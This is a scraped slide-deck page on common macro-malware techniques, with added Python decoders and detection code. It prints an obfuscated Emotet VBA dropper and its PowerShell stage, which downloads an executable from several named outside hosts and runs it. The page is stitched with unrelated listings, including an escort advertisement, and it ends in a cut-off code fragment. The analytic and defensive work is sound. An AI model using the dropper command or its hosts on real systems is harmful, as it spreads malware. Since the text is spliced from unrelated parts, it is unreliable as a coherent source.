Macro malware –
Common Techniques
<m4n0w4r>
9/16/2019 Macro malware - common techniques 1
#Wh0_4m_1?
1. @kienmanowar/@m4n0w4r
2. Twitter: @kienbigmummy
3. Company:
4. Blog: kienmanowar.wordpress.com
5. Writer for tradahacking.vn
Agenda
• Typical Method
• Evading Parent/Child Analysis
• Scheduled Task Creation
• Registry Modification
• Dropping Files
• Download File
Cyber Kill Chain
Model by Lockheed Martin (Intelligence-Driven Computer Network Defense)
The Typical Method
Emotet variant
https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
VBA code
Code from VBA Modules
(only the top-level string-building functions are shown; the fragments they reference are defined in other modules not shown on this slide)

Sub AutoOpen()
    VBA.Shell$ iphSIiNfaNjTt, 0
End Sub

Function iphSIiNfaNjTt()
    iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + _
        vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + _
        JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + _
        vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + _
        RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL
End Function

Function aPNnoXoRGKMH()
    aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + _
        KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + _
        HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + _
        nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + _
        MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + _
        LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + _
        hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + _
        LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi
End Function

Function TiaBlsUalNnM()
    TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + _
        rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + _
        CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + _
        ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + _
        fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + _
        DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + _
        hnTWVhb + ZOrnliBU
End Function
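The module above hides the command line behind a chain of functions that each return a concatenation of other functions, string literals and Chr() calls. An analyst does not need to run the document to read it: the chain can be resolved statically. The resolver below is an added example (not code from the deck or from the sample); the module it parses is constructed in the same style, with made-up names and fragment values, and decodes to a harmless command. It handles `+` and `&` concatenation, `Chr(n)`, doubled-quote escapes and ` _` line continuations, and fails loudly on an identifier it cannot find rather than guessing.

```python
import re

# Pieces of the VBA grammar the resolver understands (constructed here):
# string-building functions, their self-assignment, the Shell call in
# AutoOpen, and concatenation terms (literal, Chr(n), or another function).
FUNC_RE = re.compile(r"Function\s+(\w+)\s*\(\)(.*?)End Function", re.DOTALL | re.IGNORECASE)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.MULTILINE)
SHELL_RE = re.compile(r"\bShell\$?\s+(\w+)", re.IGNORECASE)
TERM_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\s*\(\s*(\d+)\s*\)|(\w+)', re.IGNORECASE)


def join_continuations(src):
    """Collapse VBA ' _' line continuations so each statement is one line."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


def parse_functions(src):
    """Map each Function name (lower-cased) to the expression it assigns to itself."""
    funcs = {}
    for name, body in FUNC_RE.findall(join_continuations(src)):
        for target, expr in ASSIGN_RE.findall(body):
            if target.lower() == name.lower():
                funcs[name.lower()] = expr
    return funcs


def resolve(expr, funcs, depth=0):
    """Evaluate a concatenation: '+' and '&' are skipped, literals and Chr(n)
    are taken as-is, any other identifier is another function to resolve."""
    if depth > 64:
        raise RecursionError("concatenation chain too deep (self-referential?)")
    out = []
    for lit, chr_code, ident in TERM_RE.findall(expr):
        if chr_code:
            out.append(chr(int(chr_code)))
        elif ident:
            key = ident.lower()
            if key not in funcs:
                raise KeyError(f"undefined identifier {ident!r}")
            out.append(resolve(funcs[key], funcs, depth + 1))
        else:
            out.append(lit.replace('""', '"'))
    return "".join(out)


def decode_shell_argument(src):
    """Find the argument handed to Shell and return it fully resolved."""
    src = join_continuations(src)
    m = SHELL_RE.search(src)
    if not m:
        raise ValueError("no Shell call found")
    return resolve(m.group(1), parse_functions(src))


# Constructed sample module in the style of the slide: every fragment of the
# command line sits behind a function that concatenates other functions.
# Names and string values are made up; the decoded command is harmless.
SAMPLE_MODULE = '''
Sub AutoOpen()
    VBA.Shell$ qxTgBwL, 0
End Sub

Function qxTgBwL()
    qxTgBwL = hNwPz + mRkQo + Chr(34) + _
              dVcXe + Chr(34)
End Function

Function hNwPz()
    hNwPz = "cm" + "d /" + yTrLk
End Function

Function yTrLk()
    yTrLk = "c e"
End Function

Function mRkQo()
    mRkQo = "cho "
End Function

Function dVcXe()
    dVcXe = "macro " & "decoded"
End Function
'''

if __name__ == "__main__":
    print(decode_shell_argument(SAMPLE_MODULE))
```

On a real Emotet module the leaf functions are spread over several modules; concatenate the extracted module sources (olevba dumps them in order) before handing them to `decode_shell_argument`, and treat a `KeyError` as a sign that a module is missing rather than as a decoding failure.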
Decoded VBA call to obfuscated powershell
cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set
%UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set
%jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set
%DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%!
"(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect
System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd
=k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd =
Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e
asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9
Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i
4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp
lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B-
i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk
9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas =
'+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1,
k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B
rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas +
H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B
rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4
Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke-
k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i
4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost
rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7
8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+
')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) -
cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 -
cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe
([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe
'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X')
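The PowerShell layer above is built by splitting the script into `'+'`-joined fragments, swapping every quote and `$` for a placeholder token (k9B, i4T, rON, H1I, GLo, JYX ...) and restoring them with a chain of replace operators whose arguments are themselves assembled from `[chAR]` casts, before the result is piped to `iex` spelled out of `$ShellId`. A decoder for that wrapper pattern, as an added example that is not part of the deck: it tokenises literals, `[char]` casts and replace operators, joins `'+'`-concatenated pieces, applies the replaces in order (honouring that `-replace` is case-insensitive while `.Replace()` and `-creplace` are not) and repeats until no wrapper remains. The two-layer input is constructed in the slide's style and decodes to a harmless command.

```python
import re

# Grammar of the wrapper (constructed here from the pattern on the slide):
# single-quoted literals, [char]NN casts joined with '+', and replace
# operators whose arguments are built from those casts.
LITERAL = re.compile(r"'((?:[^']|'')*)'")
CHARCAST = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
REPLACE_OP = re.compile(r"(\.|-)(c?)replace\b", re.IGNORECASE)


def tokenize(src):
    """Emit ('lit', text, start, end) for literals and [char] casts and
    ('op', case_sensitive, start, end) for replace operators; skip the rest."""
    tokens, pos = [], 0
    while pos < len(src):
        if m := LITERAL.match(src, pos):
            tokens.append(("lit", m.group(1).replace("''", "'"), m.start(), m.end()))
        elif m := CHARCAST.match(src, pos):
            tokens.append(("lit", chr(int(m.group(1))), m.start(), m.end()))
        elif m := REPLACE_OP.match(src, pos):
            # .Replace() and -creplace are case-sensitive, -replace is not
            sensitive = m.group(1) == "." or m.group(2).lower() == "c"
            tokens.append(("op", sensitive, m.start(), m.end()))
        else:
            pos += 1
            continue
        pos = m.end()
    return tokens


def merge_concatenations(src, tokens):
    """Join neighbouring literals whose glue is only whitespace, '+' or
    parentheses: the ('a'+'b') and ([char]72+[char]49+[char]73) idioms."""
    merged = []
    for tok in tokens:
        if merged and tok[0] == "lit" and merged[-1][0] == "lit":
            glue = src[merged[-1][3]:tok[2]]
            if glue.strip(" \t\r\n+()") == "":
                prev = merged.pop()
                tok = ("lit", prev[1] + tok[1], prev[2], tok[3])
        merged.append(tok)
    return merged


def unwrap_layer(src):
    """Peel one wrapper: the first literal is the payload; each replace
    operator after it consumes a (pattern, replacement) pair of literals.
    Returns None when there is no replace operator left to apply."""
    tokens = merge_concatenations(src, tokenize(src))
    lits = [i for i, t in enumerate(tokens) if t[0] == "lit"]
    if not lits or not any(t[0] == "op" for t in tokens):
        return None
    payload = tokens[lits[0]][1]
    i = lits[0] + 1
    while i + 2 < len(tokens) and tokens[i][0] == "op":
        pattern, repl = tokens[i + 1][1], tokens[i + 2][1]
        flags = 0 if tokens[i][1] else re.IGNORECASE
        # lambda keeps backslashes in the replacement ([char]92) literal
        payload = re.sub(re.escape(pattern), lambda _m: repl, payload, flags=flags)
        i += 3
    return payload


def deobfuscate(src, max_layers=8):
    """Return every layer, outermost first, down to the plain command."""
    layers = [src]
    while len(layers) < max_layers and (nxt := unwrap_layer(layers[-1])) is not None:
        layers.append(nxt)
    return layers


# Constructed sample in the slide's style. Inner layer: quotes hidden as H1I.
# Outer layer: the inner script is stored with quotes as k9B and '$' as rON,
# both restored by -replace / -creplace before piping to iex
# ($ShellId[1]+$ShellId[13]+'X' spells "ieX"). The final command is harmless.
INNER_WITH_PLACEHOLDERS = (
    "((k9BWrk9B+k9Bite-Outk9B+k9Bput H1Ihello worldH1Ik9B)"
    ".rEPlACE(([chAR]72+[chAR]49+[chAR]73),[StrING][chAR]39))"
    " | & (rONShellId[1]+rONShellId[13]+k9BXk9B)"
)
OUTER = (
    "(('" + INNER_WITH_PLACEHOLDERS + "')"
    " -rEPlaCe ([ChAr]107+[ChAr]57+[ChAr]66),[ChAr]39"
    " -CrePLace ([ChAr]114+[ChAr]79+[ChAr]78),[ChAr]36)"
    " | & ($ShellId[1]+$ShellId[13]+'X')"
)

if __name__ == "__main__":
    for depth, layer in enumerate(deobfuscate(OUTER)):
        print(f"layer {depth}: {layer}")
```

The decoder deliberately never evaluates anything: it only performs the string surgery the wrapper itself describes, so it is safe to run on a captured command line. A layer that still contains `$env:` or `$ShellId` indexing after unwrapping is a hint that the next stage resolves names at run time and needs manual reading.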
Decoded powershell
Evading Parent/Child Analysis
• Spawning the payload directly from the Office process is relatively anomalous behaviour and can easily be detected by most modern blue teams.
Spawning via WmiPrvSE.exe using WMI
https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes
• The new process is spawned under “wmiprvse.exe” instead of under the Office process. The code to perform this is below:
Spawning via ShellCOM
• https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
• https://github.com/tyranid/oleviewdotnet (James Forshaw)
Spawning via ShellCOM
• Sample code using ShellBrowserWindow:
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
Spawning via ShellCOM
• Sample code using ShellWindows:
Parent PID Spoofing with CreateProcessA
• The CreateProcessA API takes a parameter called “lpStartupInfo” through which you can essentially define the parent process you want the new process to appear under.
– lpStartupInfo points to a STARTUPINFOEX structure
Sample in the wild
https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/
1st stage VBA Code
Decoded base64 String
2nd VBA code (1)
dllhost.exe runs as a child of explorer.exe
2nd VBA code (2)
Scheduled Task Creation
• VBScript lets us create Scheduled Tasks, which can be abused so that the activity is no longer tied to Office (svchost.exe will spawn the task).
– Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger-example--scripting-
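Detection logic for the lineage patterns described in the two sections above (an Office parent spawning a shell, an interpreter under wmiprvse.exe, a task-scheduler svchost spawning a script host) together with the caret and delayed-expansion cmd.exe obfuscation shown on the Emotet slide. This is an added example, not from the deck; the records are constructed Sysmon-style Event ID 1 fields, and the `-s Schedule` check relies on service-specific svchost hosting, which shows the Schedule service name on the parent's command line. DCOM launches and parent-PID spoofing make the lineage look like explorer.exe, which a pure parent check will not catch, so the command-line rule runs independently of the parent.

```python
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def caret_obfuscation(cmdline):
    """cmd.exe tricks from the slide: '^' escapes inside %ComSpec% and
    delayed expansion (/V with !var! references)."""
    lowered = cmdline.lower()
    return cmdline.count("^") >= 3 or ("/v" in lowered and "!" in cmdline)


def classify(event):
    """Return the list of rule names a single process-creation record trips."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    parent_cl = event.get("ParentCommandLine", "").lower()
    cmdline = event.get("CommandLine", "")
    rules = []
    if parent in OFFICE and image in INTERPRETERS:
        rules.append("office-spawned-interpreter")
    if parent == "wmiprvse.exe" and image in INTERPRETERS:
        rules.append("wmi-spawned-interpreter")
    if parent == "svchost.exe" and "-s schedule" in parent_cl and image in INTERPRETERS:
        rules.append("scheduled-task-spawned-interpreter")
    if image == "cmd.exe" and caret_obfuscation(cmdline):
        rules.append("cmd-caret-obfuscation")
    return rules


def triage(events):
    """(image, rules) for every record that trips at least one rule."""
    hits = []
    for event in events:
        rules = classify(event)
        if rules:
            hits.append((basename(event["Image"]), rules))
    return hits


# Constructed Sysmon-style process-creation records used as sample input;
# none of these come from the slides' samples.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentCommandLine": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\invoice.doc"',
     "CommandLine": "cmd a b c & %C^om^S^p^Ec% /V /c set !x!=y"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentCommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Roaming\update.vbs"'},
    {"Image": r"C:\Windows\System32\dllhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p",
     "CommandLine": r"C:\Windows\system32\DllHost.exe /Processid:{00000000-0000-0000-0000-000000000000}"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS):
        print(image, rules)
```

The benign dllhost.exe under the DcomLaunch svchost and notepad.exe under explorer.exe are there on purpose: the rules stay quiet on them, which is the baseline a detection needs to hold before it is tuned against real telemetry.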
Sample in the wild
https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14
Extract out the VBA Macro code
Sub Document_Open()
Sub Document_Close()
A sample of APT32 (aka OceanLotus)
https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
Registry Modification
• VBScript also gives access to the registry, allowing payloads to be stored, settings modified and persistence entries created directly from a macro (using WMI or WScript).
– Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--registry
Wild wild west
https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
Extract out the VBA Macro code
Write 1st decoded base64 to
"C:ProgramDataWindowsDefender.ini"
Write 2nd decoded base64 to
"C:ProgramDataDefender.sct"
Write 3rd decoded base64 to
"C:ProgramDataDefenderService.inf"
LOLBin (Living Off The Land binary)
Another #OceanLotus sample
https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
VBA code
Dropping Files
• Dropping files has its pros and cons. Making changes to disk often means payloads get analysed by antivirus and leave forensic artefacts. Yet in most breaches attackers still drop payloads to disk because of the convenience of having a solid foothold in the network.
• In VBScript we can make use of the FileSystemObject to drop files.
Yet another sample of #OceanLotus…
https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
VBA code…
Dropping dll file
Another sample
https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
VBA Code – Get Base64 data
VBA Code – Decode b64 and execute payload
Download file
• There are multiple ways VBScript can be used to download content. The downloaded content can then be dropped to disk, inserted into the registry or injected into memory.
• One of the most common and simplest methods is the XMLHTTP object together with an ADODB stream to write the response to a file.
• Another option is a direct API call: a simple VBScript download cradle can be implemented with URLDownloadToFileA.
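The techniques covered from the WMI/DCOM spawning slides onward (scheduled tasks, registry access, FileSystemObject drops, the XMLHTTP/ADODB and URLDownloadToFile cradles) and the base64-carrying samples ("Get Base64 data", "Decode b64 and execute payload") all leave recognisable names in the macro source, so a first-pass triage can be done statically on the text olevba extracts. The scanner below is an added example (not from the deck): it maps each technique to the objects and APIs a macro would name, then pulls every long base64 run out of the source, decodes it and classifies it by its leading bytes (PE, scriptlet, INF). The two CLSIDs in the DCOM rule are the well-known ShellWindows and ShellBrowserWindow identifiers; the macro it scans is constructed, and its embedded blobs are fake headers rather than real payloads.

```python
import base64
import binascii
import re

# Each technique on the slides mapped to the objects/APIs a macro would name.
# The two CLSIDs are the well-known ShellWindows / ShellBrowserWindow ids used
# with GetObject("new:{...}") in the DCOM technique.
INDICATORS = {
    "auto-exec trigger": r"\b(AutoOpen|Auto_Open|Document_Open|Document_Close|Workbook_Open)\b",
    "shell execution": r"\bShell\b|WScript\.Shell",
    "WMI process creation": r"winmgmts:|Win32_Process",
    "DCOM shell object": (r"ShellWindows|ShellBrowserWindow|"
                          r"9BA05972-F6A8-11CF-A442-00A0C90A8F39|"
                          r"C08AFD90-F2A1-11D1-8455-00A0C91F3880"),
    "parent PID spoofing": r"\bCreateProcessA?\b|STARTUPINFOEX|UpdateProcThreadAttribute",
    "scheduled task": r"Schedule\.Service|\bschtasks\b",
    "registry access": r"StdRegProv|\bRegWrite\b|\bRegRead\b|CurrentVersion\\Run",
    "file drop": r"Scripting\.FileSystemObject|\bCreateTextFile\b|\bSaveToFile\b",
    "download cradle": r"XMLHTTP|ADODB\.Stream|URLDownloadToFile",
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def classify_blob(data):
    """Guess what a decoded blob is from its leading bytes."""
    head = data[:256].lower()
    if data.startswith(b"MZ"):
        return "PE executable"
    if b"<scriptlet" in head or b"<?xml" in head:
        return "scriptlet (.sct)"
    if b"[version]" in head:
        return "INF"
    return "unknown"


def extract_blobs(src):
    """Decode every long base64 run in the macro text; skip runs that are not
    valid base64 (identifiers, partial matches)."""
    blobs = []
    for m in BASE64_BLOB.finditer(src):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue
        blobs.append((classify_blob(data), len(data)))
    return blobs


def scan(src):
    """Technique labels the source trips, plus the classified embedded blobs."""
    techniques = sorted(name for name, pattern in INDICATORS.items()
                        if re.search(pattern, src, re.IGNORECASE))
    return {"techniques": techniques, "blobs": extract_blobs(src)}


# Constructed macro for the sample run: a fake PE header and a fake scriptlet
# are embedded as base64 the way the slides' samples carry their stages.
FAKE_PE = b"MZ\x90\x00\x03\x00" + b"constructed fake PE header" + b"\x00" * 16
FAKE_SCT = b'<?XML version="1.0"?><scriptlet><registration progid="constructed"/></scriptlet>'

SAMPLE_MACRO = f'''
Private Sub Document_Open()
    Dim fso As Object, http As Object, bin As Object, svc As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set http = CreateObject("MSXML2.XMLHTTP")
    Set bin = CreateObject("ADODB.Stream")
    Set svc = CreateObject("Schedule.Service")
    exe = "{base64.b64encode(FAKE_PE).decode()}"
    sct = "{base64.b64encode(FAKE_SCT).decode()}"
End Sub
'''

if __name__ == "__main__":
    report = scan(SAMPLE_MACRO)
    print("techniques:", ", ".join(report["techniques"]))
    for kind, size in report["blobs"]:
        print(f"blob: {kind} ({size} bytes)")
```

Samples that split their base64 across many short string literals (as the OceanLotus macros on the earlier slides do) will not produce a 40-character run; feed such a macro through a concatenation resolver first, then scan the resolved strings.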
Some sample code
Sample
https://www.virustotal.com/gui/file/e2d878a43607c04f151052e81a560a80525a343ea4e719c3a79e1cc8c45e47c5
Extract out VBA code
Extract out VBA code
Other sample
https://www.virustotal.com/gui/file/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
VBA Code
End!

Exploring the Future Potential of AI-Enabled Smartphone Processors
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Macro malware common techniques - public

  • 9. Decoded VBA call to obfuscated powershell cmd
  • 11. Decoded powershell
  • 12. Evading Parent/Child Analysis
  • 13. • This behavior (a child process spawned directly by the Office application) is relatively anomalous and can easily be detected by most modern blue teams.
  • 14. Spawning via WmiPrvse.exe using WMI https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes • The new process will be spawned under “wmiprvse.exe” instead of the Office process. The code to perform this is shown on the slide.
  • 15. Spawning via ShellCOM • https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ • https://github.com/tyranid/oleviewdotnet (James Forshaw)
  • 16. Spawning via ShellCOM • Sample code using ShellBrowserWindow: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
  • 17. Spawning via ShellCOM • Sample code using ShellWindows:
  • 18. Parent PID Spoofing with CreateProcessA • The CreateProcessA API call takes a parameter called “lpStartupInfo” through which you can essentially define the parent process you want the new process to appear under. – The lpStartupInfo parameter points to a STARTUPINFOEX structure
  • 19. Sample in the wild https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/
  • 20. 1st stage VBA code
  • 21. Decoded base64 string
  • 22. 2nd VBA code (1)
  • 23. dllhost.exe runs as a child of explorer.exe
  • 24. 2nd VBA code (2)
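Every trick in this section removes the Office application from the visible parent/child chain, so a rule that only looks for an Office parent misses it. The added example below (not from the deck, written here for illustration) instead correlates process-start events by host and time, treating a script host under wmiprvse.exe, svchost.exe or explorer.exe as more suspicious when an Office application started on the same host shortly before; the event fields and all sample records are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children worth flagging: script hosts, plus dllhost.exe (the COM surrogate the deck shows under explorer.exe)
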